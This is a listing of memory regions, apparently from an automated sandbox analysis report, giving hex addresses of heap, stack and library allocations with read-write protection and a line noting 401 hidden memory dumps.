296912BD000
|
heap
|
page read and write
|
||
|
296912CD000
|
heap
|
page read and write
|
||
|
C46BD7E000
|
stack
|
page read and write
|
||
|
AB8B4FE000
|
stack
|
page read and write
|
||
|
C46BBF8000
|
stack
|
page read and write
|
||
|
7FF886D60000
|
trusted library allocation
|
page read and write
|
||
|
296912A1000
|
heap
|
page read and write
|
||
|
2969128D000
|
heap
|
page read and write
|
||
|
29691831000
|
heap
|
page read and write
|
||
|
7FF886DF0000
|
trusted library allocation
|
page read and write
|
||
|
1C47A5C6000
|
heap
|
page read and write
|
||
|
C46BA79000
|
stack
|
page read and write
|
||
|
251EBD2D000
|
heap
|
page read and write
|
||
|
296912BA000
|
heap
|
page read and write
|
||
|
2969131D000
|
heap
|
page read and write
|
||
|
AB8B6FF000
|
stack
|
page read and write
|
||
|
7FF886DF0000
|
trusted library allocation
|
page read and write
|
||
|
1C4607F6000
|
heap
|
page read and write
|
||
|
296912DA000
|
heap
|
page read and write
|
||
|
1C460780000
|
trusted library allocation
|
page read and write
|
||
|
296912F7000
|
heap
|
page read and write
|
||
|
251EDC5A000
|
heap
|
page read and write
|
||
|
C46BB79000
|
stack
|
page read and write
|
||
|
251EDA15000
|
heap
|
page read and write
|
||
|
1C460603000
|
heap
|
page read and write
|
||
|
2968F928000
|
heap
|
page read and write
|
||
|
29691261000
|
heap
|
page read and write
|
||
|
D8E7CFE000
|
stack
|
page read and write
|
||
|
251EBCD9000
|
heap
|
page read and write
|
||
|
1C4604F0000
|
trusted library allocation
|
page read and write
|
||
|
1C4604B0000
|
heap
|
page read and write
|
||
|
AB8B77F000
|
stack
|
page read and write
|
||
|
2969128A000
|
heap
|
page read and write
|
There are 401 hidden memdumps, click here to show them.